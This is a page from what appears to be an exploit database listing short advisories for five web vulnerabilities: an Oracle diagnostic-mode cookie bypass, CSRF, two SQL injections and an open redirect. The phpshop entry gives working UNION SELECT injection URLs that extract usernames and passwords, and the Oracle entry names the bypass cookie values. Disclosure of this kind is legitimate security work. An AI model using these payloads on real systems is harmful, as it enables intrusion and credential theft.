header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Trustwave SpiderLabs Security Advisory TWSL2012-023: Oracle Application Framework Diagnostic Mode Bypass Vulnerability

The Oracle Application Framework supports a diagnostic and developer mode feature that are intended to be enabled from developer or administrative interfaces. However, any user can manually enable the modes by setting the 'OADiagnostic' or 'OADeveloperMode' cookies to '1'.

Cydia Repo Manager CSRF Vulnerability

Cydia Repo Manager is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious HTML form and submit it to the vulnerable application. This form can be used to perform administrative actions such as creating a new user, changing the password of an existing user, or uploading a malicious file. The malicious form can be hosted on any website and can be used to target users of the vulnerable application. The malicious form can also be sent via email or instant messaging.

CMS snews SQL Injection Vulnerability

A SQL injection vulnerability exists in CMS snews, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in the 'snews.php' script. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords stored in the database.

phpshop 2.0 SQL Injection Vulnerability

SQLi p0c: http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--

phlyLabs phlyMail Lite 4.03.04 (go param) Open Redirect Vulnerability

Input passed via the 'go' parameter in 'derefer.php' script is not properly verified before being used to redirect users. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.

Recent Exploits: